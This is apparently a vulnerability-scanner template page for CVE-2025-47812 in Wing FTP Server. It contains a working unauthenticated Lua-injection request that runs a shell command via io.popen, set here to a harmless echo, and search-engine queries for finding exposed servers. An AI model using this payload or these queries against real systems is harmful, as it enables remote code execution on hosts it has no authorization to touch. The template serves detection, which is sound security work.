Wing FTP Server <= 7.4.3 - Remote Code Execution

CVE-2025-47812

Verified

Description

Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) flaw (CVE-2025-47812). The vulnerability arises from improper NULL byte handling in the 'username' parameter during login, which allows Lua code injection into session files. These injected session files are executed when accessing authenticated endpoints such as /dir.html, resulting in arbitrary command execution with elevated privileges. This attack is possible only when anonymous login is enabled on the server.

Severity

Critical

CVSS Score

9.8

Exploit Probability

97%

Affected Product

wftpserver

Published Date

July 1, 2025

Template Author

rcesecurity, 4m3rr0r

CVE-2025-47812.yaml

id: CVE-2025-47812

info:
  name: Wing FTP Server <= 7.4.3 - Remote Code Execution
  author: rcesecurity,4m3rr0r
  severity: critical
  description: |
    Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) flaw (CVE-2025-47812).
    The vulnerability arises from improper NULL byte handling in the 'username' parameter during login, which allows Lua code injection
    into session files. These injected session files are executed when accessing authenticated endpoints such as /dir.html, resulting
    in arbitrary command execution with elevated privileges. This attack is possible only when anonymous login is enabled on the server.
  reference:
    - https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
    - https://github.com/4m3rr0r/CVE-2025-47812-poc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-47812
    epss-score: 0.97
    epss-percentile: 0.99
  metadata:
    verified: true
    product: wftpserver
    vendor: wing_ftp_server
    shodan-query:
      - http.html_hash:2121146066
      - http.favicon.hash:963565804
      - title:"Wing FTP Server"
      - "Server: Wing FTP Server"
    fofa-query:
      - icon_hash="963565804"
      - title="Wing FTP Server"
      - "Server: Wing FTP Server"
    zoomeye-query:
      - app="Wing FTP Server"
  tags: cve,cve2025,rce,wingftp,ftp,unauth

variables:
  cmd: "echo CVE-2025-47812"

http:
  - raw:
      - |
        POST /loginok.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=anonymous%00]]%0dlocal+h+%3d+io.popen("{{cmd}}")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=

  - raw:
      - |
        GET /dir.html HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(to_lower(body), "cve-2025-47812")'
        condition: and
# digest: 4b0a0048304602210086e6de6403641ae1d7c2b4e2fda239c45edeee6f6fb067f2fbdda234b67e79e502210090ee323cfc7e014e8ee545f64d15c176aa1d1f02c7a07dc3450b10df42f2dd17:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2025-47812

References

https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/https://github.com/4m3rr0r/CVE-2025-47812-poc